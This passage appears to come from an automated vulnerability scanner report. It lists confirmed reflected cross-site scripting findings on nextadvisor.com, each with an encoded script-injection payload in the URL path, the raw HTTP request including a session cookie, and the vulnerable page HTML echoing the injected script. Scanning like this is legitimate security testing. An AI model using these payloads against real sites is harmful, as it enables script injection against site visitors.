id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog201008..
- /internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E

/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000345)</script>

Request

GET /internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/internet_security_software/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7452
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", internet security software, antivirus, anti-spyware, virus removal, spyware removal, spyware, spam blocker, Norton Internet Security 2011, Eset, BitDefender, Kaspersky Internet Security 2011, McAfee Total Protection 2011, Avast! Internet Security, Webroot Internet Security Complete 2011, AVG Internet Security, ZoneAlarm Internet Security Suite 2010, CA Internet Security Suite Plus 2010, Trend Micro Internet Security 2010" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/internet_security_software/'"--></style></script><script>netsparker(0x000345)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000345)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/internet_security_software_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Internet Security Software FAQ</h1> <p>Frequently Asked Questions about Internet Security Software</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Internet Security Software:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="internet_security_software"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blo..
- /online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E

/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000356)</script>

Request

GET /online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_tax_preparation_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:12 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6483
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", tax preparation, efile, tax online, taxes online, irs, federal tax return, state tax return, online tax preparation, tax prep, 1040, 1040ez, electronic file, free federal tax return, H&R Block, TurboTax, TaxAct, CompleteTax, E-File Tax Returns, TaxSimple" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_tax_preparation_services/'"--></style></script><script>netsparker(0x000356)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000356)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_tax_preparation_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Tax Preparation and Filing FAQ</h1> <p>Frequently Asked Questions about Online Tax Preparation and Filing</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Tax Preparation and Filing:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_tax_preparation_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 